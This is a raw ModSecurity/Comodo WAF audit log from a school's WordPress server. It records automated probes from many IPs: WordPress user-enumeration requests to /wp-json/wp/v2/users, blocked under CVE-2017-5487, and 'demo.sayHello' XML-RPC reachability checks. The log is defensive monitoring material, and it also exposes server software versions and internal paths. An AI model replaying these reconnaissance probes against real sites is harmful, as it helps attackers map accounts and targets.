--0f7cd31c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f7cd31c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747438884839316 2953 (- - -) Stopwatch2: 1747438884839316 2953; combined=1291, p1=429, p2=832, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f7cd31c-Z-- --fc4e7633-A-- [17/May/2025:06:41:30 +0700] aCfNKgTOsBn9MSWb6WJt2wAAAJQ 103.236.140.4 42236 103.236.140.4 8181 --fc4e7633-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.10.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.10.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc4e7633-C-- demo.sayHello --fc4e7633-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc4e7633-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747438890100045 5935 (- - -) Stopwatch2: 1747438890100045 5935; combined=4350, p1=585, p2=3539, p3=32, p4=36, p5=94, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc4e7633-Z-- --d68b5408-A-- [17/May/2025:07:05:01 +0700] aCfSrXyxdQCiyU1ENFcmdQAAAA4 103.236.140.4 42358 103.236.140.4 8181 --d68b5408-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d68b5408-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d68b5408-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440301283075 2929 (- - -) Stopwatch2: 1747440301283075 2929; combined=1325, p1=456, p2=837, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d68b5408-Z-- --20ea895c-A-- [17/May/2025:07:05:07 +0700] aCfSs3yxdQCiyU1ENFcmdwAAABM 103.236.140.4 42362 103.236.140.4 8181 --20ea895c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.240.99.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.240.99.163 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20ea895c-C-- demo.sayHello --20ea895c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20ea895c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440307740796 5859 (- - -) Stopwatch2: 1747440307740796 5859; combined=4404, p1=619, p2=3378, p3=29, p4=30, p5=189, sr=160, sw=159, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20ea895c-Z-- --ceb25f45-A-- [17/May/2025:07:05:10 +0700] aCfStnyxdQCiyU1ENFcmeAAAABQ 103.236.140.4 42364 103.236.140.4 8181 --ceb25f45-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ceb25f45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ceb25f45-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440310767447 3356 (- - -) Stopwatch2: 1747440310767447 3356; combined=1422, p1=493, p2=886, p3=0, p4=0, p5=42, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ceb25f45-Z-- --8eeafc36-A-- [17/May/2025:07:05:13 +0700] aCfSuXyxdQCiyU1ENFcmewAAAAA 103.236.140.4 42370 103.236.140.4 8181 --8eeafc36-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8eeafc36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8eeafc36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440313044302 2034 (- - -) Stopwatch2: 1747440313044302 2034; combined=1042, p1=320, p2=695, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8eeafc36-Z-- --d3e7904d-A-- [17/May/2025:07:05:16 +0700] aCfSvHyxdQCiyU1ENFcmfAAAABc 103.236.140.4 42372 103.236.140.4 8181 --d3e7904d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.64 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.64 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3e7904d-C-- demo.sayHello --d3e7904d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3e7904d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440316209828 5705 (- - -) Stopwatch2: 1747440316209828 5705; combined=4188, p1=551, p2=3398, p3=31, p4=36, p5=101, sr=78, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3e7904d-Z-- --37c9e278-A-- [17/May/2025:07:05:18 +0700] aCfSvnyxdQCiyU1ENFcmfgAAAAM 103.236.140.4 42376 103.236.140.4 8181 --37c9e278-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --37c9e278-C-- demo.sayHello --37c9e278-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --37c9e278-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440318629733 4368 (- - -) Stopwatch2: 1747440318629733 4368; combined=3473, p1=404, p2=2875, p3=23, p4=24, p5=87, sr=67, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37c9e278-Z-- --1732850a-A-- [17/May/2025:07:05:43 +0700] aCfS13yxdQCiyU1ENFcmgQAAAAg 103.236.140.4 42382 103.236.140.4 8181 --1732850a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1732850a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1732850a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440343740919 2806 (- - -) Stopwatch2: 1747440343740919 2806; combined=1258, p1=441, p2=785, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1732850a-Z-- --1f15a040-A-- [17/May/2025:07:05:49 +0700] aCfS3XyxdQCiyU1ENFcmgwAAAAs 103.236.140.4 42386 103.236.140.4 8181 --1f15a040-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.165.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.165.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1f15a040-C-- demo.sayHello --1f15a040-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f15a040-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440349990763 4426 (- - -) Stopwatch2: 1747440349990763 4426; combined=3337, p1=406, p2=2753, p3=19, p4=19, p5=81, sr=66, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f15a040-Z-- --9d7d453d-A-- [17/May/2025:07:05:54 +0700] aCfS4um4kjNN-hEbWjJAkwAAAEI 103.236.140.4 42390 103.236.140.4 8181 --9d7d453d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9d7d453d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d7d453d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440354912384 2540 (- - -) Stopwatch2: 1747440354912384 2540; combined=1142, p1=391, p2=721, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d7d453d-Z-- --7d3d3616-A-- [17/May/2025:07:06:00 +0700] aCfS6HyxdQCiyU1ENFcmhgAAABE 103.236.140.4 42394 103.236.140.4 8181 --7d3d3616-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7d3d3616-C-- demo.sayHello --7d3d3616-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d3d3616-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440360933084 4811 (- - -) Stopwatch2: 1747440360933084 4811; combined=3458, p1=470, p2=2810, p3=27, p4=30, p5=72, sr=62, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d3d3616-Z-- --a6e7b616-A-- [17/May/2025:07:06:51 +0700] aCfTG3yxdQCiyU1ENFcmiAAAABI 103.236.140.4 42398 103.236.140.4 8181 --a6e7b616-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a6e7b616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6e7b616-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440411397777 2867 (- - -) Stopwatch2: 1747440411397777 2867; combined=1266, p1=458, p2=777, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6e7b616-Z-- --7c730b1f-A-- [17/May/2025:07:06:57 +0700] aCfTIXyxdQCiyU1ENFcmigAAABQ 103.236.140.4 42402 103.236.140.4 8181 --7c730b1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7c730b1f-C-- demo.sayHello --7c730b1f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7c730b1f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440417743613 6388 (- - -) Stopwatch2: 1747440417743613 6388; combined=4592, p1=608, p2=3746, p3=39, p4=43, p5=94, sr=78, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7c730b1f-Z-- --9d5d957b-A-- [17/May/2025:07:07:27 +0700] aCfTP3yxdQCiyU1ENFcmjAAAABg 103.236.140.4 42406 103.236.140.4 8181 --9d5d957b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9d5d957b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d5d957b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440447005638 3549 (- - -) Stopwatch2: 1747440447005638 3549; combined=1511, p1=532, p2=942, p3=0, p4=0, p5=37, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d5d957b-Z-- --da11274d-A-- [17/May/2025:07:07:31 +0700] aCfTQ3yxdQCiyU1ENFcmjgAAABc 103.236.140.4 42410 103.236.140.4 8181 --da11274d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --da11274d-C-- demo.sayHello --da11274d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --da11274d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440451567105 5547 (- - -) Stopwatch2: 1747440451567105 5547; combined=4067, p1=538, p2=3304, p3=31, p4=35, p5=95, sr=73, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da11274d-Z-- --215fb528-A-- [17/May/2025:07:13:47 +0700] aCfUu-m4kjNN-hEbWjJAmgAAAE4 103.236.140.4 42448 103.236.140.4 8181 --215fb528-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.57.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --215fb528-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --215fb528-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440827686797 3154 (- - -) Stopwatch2: 1747440827686797 3154; combined=1360, p1=513, p2=817, p3=0, p4=0, p5=30, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --215fb528-Z-- --c677ca18-A-- [17/May/2025:07:13:54 +0700] aCfUwum4kjNN-hEbWjJAnQAAAFI 103.236.140.4 42454 103.236.140.4 8181 --c677ca18-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.57.123 X-Forwarded-Host: smkn22-jkt.sch.id 